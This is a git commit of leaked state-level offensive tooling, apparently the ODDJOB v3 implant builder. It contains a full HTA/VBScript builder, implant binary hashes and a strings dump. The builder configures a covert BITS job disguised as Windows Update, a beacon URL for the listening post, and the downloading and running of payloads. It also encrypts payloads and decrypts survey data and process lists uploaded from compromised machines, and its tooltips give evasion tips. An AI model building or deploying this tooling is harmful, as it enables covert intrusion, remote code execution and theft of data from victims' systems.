Inital commit of Shadowbrokers 'Lost in Translation' release

oddjob/Binaries/Payloads/one_byte_payload.bin

@@ -0,0 +1 @@
+

oddjob/Binaries/oddjob_builder/ODDJOB_BUilder_v3.hta

@@ -0,0 +1,798 @@
+<html>
+<head>
+	<title>ODDJOB V3 Builder (supports ODDJOB v3.0)</title>
+	<hta:application SINGLEINSTANCE="yes" border="thick" ID=oMMApp>
+
+<script language="vbscript">
+
+Function FullPath(path)
+	Set objFSO = CreateObject("Scripting.FileSystemObject")
+	FullPath = objFSO.GetAbsolutePathName(path)
+End Function
+
+Sub CreateDir(path)
+
+	Set objFSO = CreateObject("Scripting.FileSystemObject")
+	path = objFSO.GetAbsolutePathName(path)
+	if(not objFSO.FolderExists(path)) then
+		Set objFolder = objFSO.CreateFolder(path)
+	End If
+End Sub
+
+Function BaseName(path)
+	Set objFSO = CreateObject("Scripting.FileSystemObject")
+	BaseName = objFSO.GetBaseName(path)
+End Function
+
+Sub ProjChange
+	Project.Value = ProjectList.Value
+End Sub
+
+Sub TaskChange
+	'If(TaskList.selectedIndex > 0) Then
+		'PayloadName.Value = ""
+	'End If
+
+	'If(TaskList.selectedIndex = 3) Then
+		'Argument.Value = "00:14:00"
+	'Else
+		'Argument.Value = ""
+	'End If
+End Sub
+
+Sub CopyFile (src, dest)
+
+	Const OverwriteExisting = True
+	Set objFSO = CreateObject("Scripting.FileSystemObject")
+	
+	src = objFSO.GetAbsolutePathName(src)
+	dest = objFSO.GetAbsolutePathName(dest)
+	'MsgBox src & " " & dest
+	objFSO.CopyFile src , dest, OverwriteExisting
+
+End Sub
+
+Function ZeroPad( ByVal sNumber, ByVal nPadFactor )
+    	ZeroPad = Right( String( nPadFactor, "0" ) & Trim( sNumber ), nPadFactor )
+End Function
+
+Function CheckFile(path)
+	Set objFSO = CreateObject("Scripting.FileSystemObject")
+	If(Not objFSO.FileExists(path)) Then
+		MsgBox path & " not found, please build implant source before continuing"
+		Exit Function
+	End If
+End Function
+
+Sub LoadTextAreaFromFile(path, elem)
+
+    ForReading = 1
+    Set objFSO = CreateObject("Scripting.FileSystemObject")
+    Set objFile = objFSO.OpenTextFile(path, ForReading)
+    
+    'Do Until objFile.AtEndOfStream
+        'strLine = objFile.ReadLine
+        'Set objOption = Document.createElement("OPTION")
+        'objOption.Text = strLine
+        'objOption.Value = strLine
+	'list.Add(objOption)	
+    'Loop
+
+    elem.InnerText = objFile.ReadAll
+    objFile.Close
+
+End Sub
+
+
+Sub EnumFolders(Path)
+
+	Set objFSO = CreateObject("Scripting.FileSystemObject")
+	Set objFolder = objFSO.GetFolder(Path)
+	Set colSubfolders = objFolder.Subfolders
+	For Each objSubfolder in colSubfolders
+
+		If(Left(objSubFolder.Name, 1) <> ".") then
+			Set objOption = Document.createElement("OPTION")
+		        objOption.Text = objFSO.GetFileName(objSubFolder.Name)
+		        objOption.Value = objFSO.GetFileName(objSubFolder.Name)
+		        ProjectList.Add(objOption)
+		End If
+
+	Next
+
+End Sub
+
+Function DateDir
+	curDate = Now()
+	DateDir = ZeroPad(Year(curDate),4) & ZeroPad(Month(curDate),2) & ZeroPad(Day(curDate),2) & _
+		"-" & _
+		 ZeroPad(Hour(curDate),2) & ZeroPad(Minute(curDate),2) & ZeroPad(Second(curDate),2)
+End Function
+
+
+Sub VBInit
+
+	Set objFSO = CreateObject("Scripting.FileSystemObject")
+	curDir = objFSO.GetAbsolutePathName(".")
+	
+	'MsgBox DateDir()
+
+	buildPath = curDir & "\builder"
+	EnumFolders(buildPath & "\Projects")
+
+	CheckFile(buildPath & "\oddjob_config_v3.exe")
+	Project.Value = ProjectList.Value
+	
+End Sub
+
+Sub SaveStringToFile (path, string)
+
+    ForWriting = 2
+
+    Set objFSO = CreateObject("Scripting.FileSystemObject")
+    If(Not objFSO.FileExists(path)) Then
+    	objFSO.CreateTextFile(path)
+    End If
+
+    Set objFile = objFSO.OpenTextFile(path, ForWriting, False)
+    
+    objFile.Write(string)
+    objFile.Close
+End Sub
+
+
+</script>
+
+<script language="javascript">
+
+
+function Exec(cmdLine, outStr)
+{
+	var oShell = new ActiveXObject("WScript.Shell");
+	var oExec  = oShell.Exec(cmdLine);
+
+	while(!oExec.StdOut.AtEndOfStream)
+	{
+		outStr += oExec.StdOut.Read(1);
+	}	
+}
+
+function StrVal(elem)
+{
+	var s = elem.value;
+	if(s == "")
+		return "0";
+	else
+		return s;
+}
+
+function Build(operation)
+{
+	var oshell = new ActiveXObject("WScript.Shell");
+	var oExec;
+	var sString = "";
+	var sProject = Project.value;
+	var sDate    = DateDir();
+	
+
+	// clear the error and output windows
+	oError.innerText = "";
+	oAppInfo.innerText = "";
+    oAppLoc.outerHTML = '<a id="oAppLoc" href="">' + '</a>';
+    oLogLoc.outerHTML = '<a id="oLogLoc" href="">' + '</a>';
+	
+    // create project directory
+    var sProjDir = "builder\\Projects\\" + sProject + "\\";
+    CreateDir(sProjDir);
+    
+	//
+	// Build the command line
+	//
+	var sConfig = "builder\\oddjob_config_v3.exe";
+	var sImplant = "";
+	var sSrcImplant = "";
+	var sRelease = "bin";
+	var sCmdLine = FullPath(sConfig);
+	sCmdLine = "\"" + sCmdLine + "\"";
+    
+	
+	sSrcImplant = FullPath(sRelease);
+    
+    //choose dll or exe and x86 or x64
+    if(OutputType.selectedIndex == 0)
+    {
+		sSrcImplant += "\\oddjob_v3_x86.dll";
+    }
+	if(OutputType.selectedIndex == 1)
+    {
+		sSrcImplant += "\\oddjob_v3_x64.dll";
+    }
+	if(OutputType.selectedIndex == 2)
+    {
+		sSrcImplant += "\\oddjob_v3_x86.exe";
+    }
+	if(OutputType.selectedIndex == 3)
+	{
+		sSrcImplant += "\\oddjob_v3_x64.exe";
+    }
+	
+    //configure implant
+    if(operation == 0)
+    {
+        // create directory with date stamp for this build
+        var sBuildDir = sProjDir + sDate;
+        CreateDir(sBuildDir);
+        
+        //check args
+        if(sProject == "")
+        {
+            oError.innerText = "Please specify a project";
+            return;
+        }
+        if(JobName.value == "")
+        {
+            oError.innerText = "Please set job name";
+            return;
+        }
+        if(URL1.value == "")
+        {
+            oError.innerText = "Please set URL";
+            return;
+        }
+        if(GetRequestExtension.value == "")
+        {
+            oError.innerText = "Please set get request extension";
+            return;
+        }
+        if(FileExtension.value == "")
+        {
+            oError.innerText = "Please set file extension";
+            return;
+        }		
+		if(TimeToLive == "")
+        {
+            oError.innerText = "Please set time to live";
+            return;
+        }
+        if(Beacon.value == "")
+        {
+            oError.innerText = "Please set beacon interval";
+            return;
+        }
+        if(BeaconCount.value == "")
+        {
+            oError.innerText = "Please set beacon count";
+            return;
+        }
+        
+        if(OutputFile.value == "") {
+            oError.innerText = "Please specify a file name (\"Output File Name\" cannot be empty)";
+            return;
+        }
+        
+        if(DLLExport.value == "" || DLLExport.value.length < 1 || DLLExport.value.length > 5) {
+            oError.innerText = "DllExport name is required and must be between 1 and 5 characters long";
+            return;
+        }
+        
+        //copy clean implant.exe over to build dir
+		if(OutputType.selectedIndex >1)
+		{
+			sImplant += sBuildDir + "\\" + OutputFile.value + ".ex_"
+			CopyFile(sSrcImplant, sImplant);
+		}
+		else
+		{
+			sImplant += sBuildDir + "\\" + OutputFile.value + ".dll"
+			CopyFile(sSrcImplant, sImplant);
+		}
+        
+        //add cmd flag and implant path
+        sCmdLine += " -configure " + "\"" + sImplant + "\"";
+    
+        //add BITS job name
+        sCmdLine += " " + "\"" + JobName.value + "\"";
+        
+        //add beacon URL
+        sCmdLine += " " + URL1.value;
+        
+        //add Upload job name
+        sCmdLine += " " + "\"" + UploadJobName.value + "\"";
+        
+        //add upload filename
+        sCmdLine += " " + "\"" + UploadFileName.value + "\"";
+		
+		//add extra url
+        sCmdLine += " " + URL2.value;
+		
+		//add get request extention
+		sCmdLine += " " + GetRequestExtension.value;
+		
+		//add file request extension
+        sCmdLine += " " + FileExtension.value;
+		
+        //add Time to Live
+        sCmdLine += " " + TimeToLive.value;
+        
+        //add beacon interval
+        sCmdLine += " " + Beacon.value;
+        
+        //add beacon count
+        sCmdLine += " " + BeaconCount.value;
+        
+        //add Time to Live
+        sCmdLine += " " + UTimeToLive.value;
+        
+        //add beacon interval
+        sCmdLine += " " + UBeacon.value;
+               
+        //add multipayload or single
+        sCmdLine += " " + (MultiList.selectedIndex^1); //need to flip to make configure script happy since we switche default
+        
+        sCmdLine += " " + DLLExport.value;
+      
+        if(HighPriority.checked) {
+            sCmdLine += " 2";
+        } else {
+            sCmdLine += " 1";
+        }
+	    
+	    // display the results in the PRE tag
+	    oAppLoc.outerHTML = '<a id="oAppLoc" href="file://' + FullPath(sImplant) + '">' + FullPath(sImplant) + '</a>';
+	    //log file location
+        oLogLoc.outerHTML = '<a id="oLogLoc" href="file://' + FullPath(sProjDir) + "\\" + sDate + "\\build.log"  + '">' + FullPath(sProjDir) + "\\" + sDate + "\\build.log" + '</a>';
+    }
+    
+    //decrypt survey data
+    if(operation == 1)
+    {
+      if(SurveyData.value == "")
+      {
+         oError.innerText = "Please fill in survey field";
+         return;
+      }
+      sCmdLine += " -decrypt " + SurveyData.value;
+    }
+
+    //encrypt payload
+    if(operation == 2)
+    {
+        if(inpayload.value == "" || outpayload.value == "" || SurveyData2.value == "")
+        {
+            oError.innerText = "Please fill in payload fields and survey data";
+            return;
+        }
+   
+        sCmdLine += " -encryptpayload ";
+        sCmdLine += inpayload.value + " " + outpayload.value + " " + SurveyData2.value + " " + PayloadType.selectedIndex + " " + dllOrdinal.value;
+    }
+    
+	// DecryptProcessList
+	if(operation == 3)
+	{
+		if((inencdumpproc.value == "") || (outdecdumpproc.value == ""))
+		{
+			oError.innerText = "Please specify input and output files. Input files should be of the form 408547727p1T98kPA+Ts5+xl5CNZ0B-0l6xyqug5we70syK9kN-aJOmZM2aLoXeJXAGW9fzrtfgqXSqeuDvYUI01gNs1RTen71-NgAAjkB-J4.cab";
+			return;
+		}
+		
+		sCmdLine += " -decryptDumpProcess ";
+		sCmdLine += "\"" + inencdumpproc.value + "\"";
+		sCmdLine += " " + "\"" + outdecdumpproc.value + "\"";
+	}
+	
+	
+    //dumpconfig
+    if(operation == 4)
+    {
+        if(oddjobbinary.value == "")
+        {
+            oError.innerText = "Please specifiy ODDJOB binary to dump config from";
+            return;
+        }
+        
+        sCmdLine += " -dumpconfig ";
+        sCmdLine += "\"" + oddjobbinary.value + "\"";
+    
+    }
+
+    //genpublickey
+    if(operation == 5)
+    {
+        sCmdLine += " -genpubkey ";
+    }
+    
+    //genprivatekey
+    if(operation == 6)
+    {
+        sCmdLine += " -genprivatekey";
+    }
+
+	//
+	// Execute ODDJOB config
+	//
+	oError.innerText = sCmdLine;
+    oExec = oshell.Exec(sCmdLine);
+
+	// Read it's output 
+	while(!oExec.StdOut.AtEndOfStream)
+	{
+	  sString += oExec.StdOut.Read(1);
+	}
+		          
+	oAppInfo.innerText = sString;
+	if(operation == 0)
+	{
+	    SaveStringToFile (FullPath(sProjDir) + "\\" + sDate + "\\build.log","++++ " + sDate + " ++++")
+	    SaveStringToFile (FullPath(sProjDir) + "\\" + sDate + "\\build.log", sString)
+	}
+	
+    //SaveStringToFile(FullPath(sBuildDir) + "\\build.log", sString);
+
+	// + FullPath(sFTPath) + ">smeg</a>";
+	window.scrollBy(0,document.body.clientHeight);
+
+}
+
+
+function Init()
+{
+	VBInit();
+
+}
+</script>
+<style type="text/css">
+input { padding-right: 20px; }
+</style>
+</head>
+<body onLoad="Init()">
+	<div name="Form" id="Form" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Sans-Serif">
+
+	 <DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: silver"
+                ms_positioning="FlowLayout">
+                <input type="submit" name="Button1" onClick="Build(0)" value="Build" id="Submit4" DESIGNTIMEDRAGDROP="35" />
+        
+        </DIV>
+
+	<div style="PADDING-LEFT: 5px">
+                <H3>
+                    <P></P>
+                    Build New implant for x86 or x64</H3>
+                <P>&nbsp;
+	Hover mouse over "?" for more information.
+		<table>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Project:</td>
+			<td style="width:500px"><input name="Project" style="width:248px" type="text" id="Text1" value="TEST"/>
+				<select name="ProjectList" onChange="ProjChange()" style="width:248px" type="text" id="Select1" value=""/>
+			</TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">BITS Job Name:</td>
+			<td> 
+				<input name="JobName" style="width:248px" type="text" id="JobName" value="Wu Update Client "/>
+				<a style="cursor:help;" title="BITS job name that appears on target. Choose something none suspicious and not already existing on target. 'Wu Update Client' is default Windows Update BITS job name so adding a space to create 'Wu Update Client ' works well.">?</a>
+			</TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:250px;font-weight:bold">Output File Name <span style="font-weight: normal; font-size: 13px">(No extension)</span>:</td>
+			<td> 
+				<input name="OutputFile" style="width:248px" type="text" id="OutputFile" value=""/>
+				<a style="cursor:help;" title="Filename of the output file.  This filename will be updated in the PE file's export section, along with the PE file checksum.  Do not include the file extension, it will be added automatically.">?</a>
+			</TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Primary URL:</td>
+			<td >
+				<input name="URL1" type="text" id="URL1" style="width:500px" value="http://www.update.com/msdownload/update/v3-19990518/cabpool"/>
+				<a style="cursor:help;" title="LP that ODDJOB beacons to. Can use URL or IP address. Do not include trailing slash in URL.">?</a>
+			</TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Dummy URL:</td>
+			<td >
+				<input name="URL2" type="text" id="URL2" style="width:500px" value="http://www.yahoo.com"/>
+				<a style="cursor:help;" title="URL that we will not beacon to.  Do not look up this domain.">?</a>
+			</TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Get Request Extension:</td>
+			<td >
+				<input name="GetRequestExtension" type="text" id="GetRequestExtension" style="width:248px" value=".cab"/>
+				<a style="cursor:help;" title="extension that will be appended to the end of the get requests (default .cab)">?</a>
+			</TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">File Extension:</td>
+			<td >
+				<input name="FileExtension" type="text" id="FileExtension" style="width:248px" value=".cab"/>
+				<a style="cursor:help;" title="extension that will be appended to the temp file on target (default .cab)">?</a>
+			</TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Time To Live (secs):</td>
+			<td> 
+				<input name="TimeToLive" style="width:248px" type="text" id="TimeToLive" value="0"/>
+				<a style="cursor:help;" title="Leave value of 0. Does not imply time to live on target but relates to BITS job parameters">?</a>
+			</TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Beacon Interval (secs):</td>
+			<td> 
+				<input name="Beacon" style="width:248px" type="text" id="Beacon" value="14400"/>
+				<a style="cursor:help;" title="How often to call back in seconds.">?</a>
+			</TD>
+			
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Beacon Count:</td>
+			<td> 
+				<input name="BeaconCount" style="width:248px" type="text" id="BeaconCount" value="540"/>
+				<a style="cursor:help;" title="Will stop calling back after x beacons. The beacons must successfully leave the target to be considered a beacon. After x beacons the BITS job will die but the ODDJOB binary will still exist on target and just never be executed again.">?</a>
+			</TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Upload Job Name:</td>
+			<td> 
+				<input name="UploadJobName" style="width:248px" type="text" id="Text2" value="Upload"/>
+				<a style="cursor:help;" title="Leave blank if not using upload feature">?</a>
+			</td>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Upload File Name:</td>
+			<td> 
+				<input name="UploadFileName" style="width:248px" type="text" id="Text3" value="4393update.xml"/>
+				<a style="cursor:help;" title="File that ODDJOB will upload if found on target. ODDJOB checks if file exists each time it runs. File is looked for in the user's temp directory">?</a>
+			</TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Upload Time To Live (secs):</td>
+			<td> 
+				<input name="UTimeToLive" style="width:248px" type="text" id="Text4" value="2592000"/>
+				<a style="cursor:help;" title="Time in seconds between upload attempts.">?</a>
+			</TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Upload Beacon Interval (secs):</td>
+			<td> 
+				<input name="UBeacon" style="width:248px" type="text" id="Text5" value="14400"/>
+				<a style="cursor:help;" title="How often to try and upload the specified file once it exists on target.">?</a>
+			</TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold;text-align:top">MultiPayload:</td>
+			<td>
+				<select name="MultiList" style="width:248px" type="text" id="MultiList" value="">
+				<option name="EXE">YES</option>
+				<option name="Multi">NO</option>
+				</select>
+				<a style="cursor:help;" title="Multipayload instructs ODDJOB to continue to callback, download and execute more than one payload. If this is set to 'no' then ODDJOB will only download and execute one payload after which it will not callback anymore. The implant will still exist on target but will never be executed again.">?</a>
+			</TD>
+		</TR>
+        <TR>
+            <td valign="top" style="width:180px;font-weight:bold;text-align:top">High Priority Job:</td>
+			<td>
+                <input type="checkbox" name="HighPriority" value="2"></input>
+            </td>
+        </TD>
+		<tr><td><p>&nbsp</p></td></tr>
+        <TR>
+			<td valign="top" style="width:250px;font-weight:bold">DLL Export Name:</td>
+			<td> 
+				<input name="DLLExport" style="width:248px" type="text" id="DllExport" value="start"/>
+				<a style="cursor:help;" title="Exported function name for the DLL.  The default is &quot;start&quot; and the limit is 5 characters">?</a>
+			</TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold;text-align:top">Output Type:</td>
+			<td>
+				<select name="OutputType" style="width:248px" type="text" id="Select3" value="">
+				<option name="DLL_x86">DLL x86 (32-bit)</option>
+				<option name="DLL_x64">DLL x64 (64-bit)</option>
+				<option name="EXE_x86">EXE x86 (32-bit)</option>
+				<option name="EXE_x64">EXE x64 (64-bit)</option>
+				</select>
+			</TD>
+		
+		
+		</TR>
+		
+		</table>
+		</p>
+	</div>	
+
+	 <DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: white"
+                ms_positioning="FlowLayout">
+            </DIV>
+
+        </div>
+            
+        
+        
+    <div name="Form" id="Div1" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Sans-Serif"> 
+	 
+	 <DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: silver"
+                ms_positioning="FlowLayout">
+                <input type="submit" name="Button1" onClick="Build(1)" value="Decrypt" id="Submit1" DESIGNTIMEDRAGDROP="35" />
+        
+     </DIV>
+
+	    <div style="PADDING-LEFT: 5px">
+                <H3>
+                    <P></P>
+                    Decrypt Survey Data</H3>
+                <P>&nbsp;
+
+		<table>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Survey Data:</td>
+			<td> 
+				<input name="SurveyData" style="width:700px" type="text" id="SurveyData" value=""/>
+				<a style="cursor:help;" title="ex. IbMdY8bgyTifVoEm0tbAy7otG53W8drKiuJ+MbTde5nXVWDDGguv3ARXJfr1-a8-djmk3kkHsTdSAPocHoqpgsab166.cab">?</a>
+			</TD>
+		</TR>
+		
+		</table>
+		</p>
+	</div>	
+
+	 <DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: white"
+                ms_positioning="FlowLayout">
+            </DIV>
+
+     </div>
+     
+     
+     
+     <div name="Form" id="Div2" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Sans-Serif"> 
+	 
+	 <DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: silver"
+                ms_positioning="FlowLayout">
+                <input type="submit" name="Button1" onClick="Build(2)" value="EncryptPayload" id="Submit2" DESIGNTIMEDRAGDROP="35" />
+        
+     </DIV>
+
+	    <div style="PADDING-LEFT: 5px">
+                <H3>
+                    <P></P>
+                    Payload Encryption</H3>
+                <P>&nbsp;
+
+		<table>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Unencrypted payload:</td>
+			<td ><input name="inpayload" type="file" id="inpayload" style="width:500px"></TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Encrypted payload:</td>
+			<td ><input name="outpayload" type="file" id="outpayload" style="width:500px"></TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold;text-align:top">Payload Type:</td>
+			<td>
+				<select name="PayloadType" style="width:248px" type="text" id="Select2" value="">
+				<option name="CMD">NULL</option>
+				<option name="EXE">EXE</option>
+				<option name="DLL">DLL</option>
+				<option name="CMD">CMD</option>
+				</select>
+                <span style="font-weight:bold;text-align:top"> DLL Ordinal: <input type="text" name="dllOrdinal" value="0" /></span>
+			</TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Survey Data:</td>
+			<td> 
+				<input name="SurveyData2" style="width:700px" type="text" id="SurveyData2" value=""/>
+				<a style="cursor:help;" title="ex. IbMdY8bgyTifVoEm0tbAy7otG53W8drKiuJ+MbTde5nXVWDDGguv3ARXJfr1-a8-djmk3kkHsTdSAPocHoqpgsab166.cab">?</a>
+			</TD>
+			
+		</TR>
+		
+		</table>
+		</p>
+	</div>	
+
+	    <div name="Form" id="Div2" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Sans-Serif"> 
+	 
+	 <DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: silver"
+                ms_positioning="FlowLayout">
+                <input type="submit" name="Button1" onClick="Build(3)" value="DecryptProcessList" id="Submit2" DESIGNTIMEDRAGDROP="35" />
+        
+     </DIV>
+
+	    <div style="PADDING-LEFT: 5px">
+                <H3>
+                    <P></P>
+                    Decrypt Uploaded Process List</H3>
+                <P>&nbsp;
+
+		<table>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Encrypted Upload File:</td>
+			<td ><input name="inencdumpproc" type="file" id="inencdumpproc" style="width:500px"></TD>
+		</TR>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">Decrypted Output File:</td>
+			<td ><input name="outdecdumpproc" type="file" id="outdecdumpproc" style="width:500px"></TD>
+		</TR>
+		</table>
+		</p>
+	</div>	
+	
+	
+	
+	 <DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: white"
+                ms_positioning="FlowLayout">
+            </DIV>
+
+     </div>
+     
+        
+        
+        
+        <div name="Form" id="Div3" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Sans-Serif"> 
+	 
+	 <DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: silver"
+                ms_positioning="FlowLayout">
+                <input type="submit" name="Button1" onClick="Build(4)" value="DumpConfig" id="Submit3" DESIGNTIMEDRAGDROP="35" />
+        
+     </DIV>
+
+	    <div style="PADDING-LEFT: 5px">
+                <H3>
+                    <P></P>
+                    Dump implant configuration data</H3>
+                <P>&nbsp;
+
+		<table>
+		<TR>
+			<td valign="top" style="width:180px;font-weight:bold">ODDJOB Binary:</td>
+			<td ><input name="oddjobbinary" type="file" id="oddjobbinary" style="width:500px"></TD>
+		</TR>
+		</table>
+		</p>
+	</div>	
+	
+	<div name="Form" id="Div4" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Sans-Serif"> 
+	 
+	 <DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: silver"
+                ms_positioning="FlowLayout">
+                <input type="submit" name="Button1" onClick="Build(5)" value="GenPublicKey" id="Submit5" DESIGNTIMEDRAGDROP="35" />
+        
+     </DIV>
+
+	    <div style="PADDING-LEFT: 5px">
+                <H3>
+                    <P></P>
+                    Generate public key to be put into implant code</H3>
+                <P>&nbsp;
+		</p>
+	</div>	
+	
+	<div name="Form" id="Div5" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Sans-Serif"> 
+	 
+	 <DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: silver"
+                ms_positioning="FlowLayout">
+                <input type="submit" name="Button1" onClick="Build(6)" value="GenPrivateKey" id="Submit6" DESIGNTIMEDRAGDROP="35" />
+        
+     </DIV>
+
+	    <div style="PADDING-LEFT: 5px">
+                <H3>
+                    <P></P>
+                    Generate implant private key to be put into config tool</H3>
+                <P>&nbsp;
+		</p>
+	</div>	
+
+        
+        
+
+<P style="font-family:Courier New" ID=oError style="color:red"></PRE>
+<PRE ID=oAppInfo> </PRE>
+<PRE>ODDJOB files located at:<br><a ID=oAppLoc href=""></a></PRE>
+<PRE ID=oLogInfo> </PRE>
+<PRE>Log files located at:<br><a ID=oLogLoc href=""></a></PRE>
+
+</body>
+</html>

oddjob/Not-For-Release/hashes.txt

@@ -0,0 +1,5 @@
+325770d2e11bfb36d59d94bd4113ca5712877a39 *../Binaries/oddjob_builder/bin/oddjob_v3_x64.dll
+742604660ba4aa04c44ad4d73c2b98ad24204b2a *../Binaries/oddjob_builder/bin/oddjob_v3_x64.exe
+cbbbb1cf3616fa794a722c68e41824cd8f017982 *../Binaries/oddjob_builder/bin/oddjob_v3_x86.dll
+8c930b130e82762581f1f9b3510442809df86d22 *../Binaries/oddjob_builder/bin/oddjob_v3_x86.exe
+68f0f4f78426dbf2a9e3abc4b4aa8d23ebc1e335 *../Binaries/oddjob_builder/builder/oddjob_config_v3.exe

oddjob/Not-For-Release/oddjob_v3_x86.dllstrings.txt

@@ -0,0 +1,624 @@
+QQSVW
+SVW3
+pSVW
+CDPP
+PWVj
+@@f;
+uM!E
+SVWh
+Phx8
+@@f;
+QSVWhX6
+t1WPV
+tdVSP
+tB9}
+PWWV
+u39]
+tUSh
+Shp6
+uXjHSh
+PWWh
+t-Wj
+uq9}
+PSWWW
+PSWj
+AAHHJu
+Wj Y
+j=Yf
+j=Yf
+u 9E
+YY9}
+4891r)
+D$$ 
+D$hSP
+D$`P
+D$ P
+D$ P
+QQSV
+u#jHj
+t;8]
+u6jD
+PVVh
+It&It
+@@f;
+@@f;
+AAf;
+@@f;
+SVW3
+vMh@4
+SSSS
+w6SSj
+SSSS
+w9SSj
+ SVW3
+PjYjCV
+QQVW
+jUY3
+9A;M
+SuPW
+@@f;
+@@f;
+t!SWP
+@@f;
+t>Sj
+_^9]
+jUZ3
+PSSSSSSh 
+PSSj
+t	VP
+GGBBf
+SSSSS
+AAf9
+WWWWW
+uaVj
+uL9=0g
+AAFFf
+wIVSP
+9=0g
+FVSj
+VVVVV
+r	f=Z
+r	f=Z
+ CCGG
+t=f;
+CCGG
+95`g
+VVVVV
+r	f=Z
+r	f=Z
+ GGBB
+8VVVVV
+f91t
+AAKu
+AAGGf;
+_^[]
+u59=@_
+9=@_
+VVVVV
+VVVVV
+uWS3
+ueSj
+@_^[
+ VW}
+j?^;
+Y__^[
+9csm
+VVVVV
+VVVVV
+YYu6h
+QQSV3
+SSSSS
+PPPPP
+SSSSS
+SSSSS
+SSSSS
+_[^]
+_^[]
+VVVV
+RPSV
+90tN
+@t7f
+PPPPP
+t$hT(
+YYt1V
+Y;=xY
+Whd(
+0A@@Ju
+95Dg
+Fh=pS
+Wto=
+Y_^[]
+_^[]
+Fpt"
+S99t
+~du	
+jThX<
+j$j _W
+Nj$j 
+QQVW3
+t)WSR
+PPPPP
+?"u?
+< tI<	tE
+@@f9
+@@f9
+SSS+
+@PWSS
+t!SS
+WWWWW
+t!hX)
+URPQQh
+L$,3
+UVWS
+[_^]
+SVWj
+_^[]
+9MZt
+_^[]
+t+Ht
+PPPPP
+ SVW
+SSSSS
+tm95
+SSSSS
+0SSSSS
+_^[]
+0SSSSS
+_^[]
+VVVVV
+WWWWW
+WWWWW
+VVVVV
+VVVVV
+GGAAf
+@@FFf
+@@FF
+WWWWW
+VVVVV
+VVVVV
+VVVVV
+Yt"V
+Yt.V
+Yt"V
+Yt.V
+Yt"V
+YYt}
+~%9M
+QVj	
+r 8^
+v	N+D$
+oV f
+o^0f
+of@f
+onPf
+ov`f
+o~pf
+j,hX=
+u8SS3
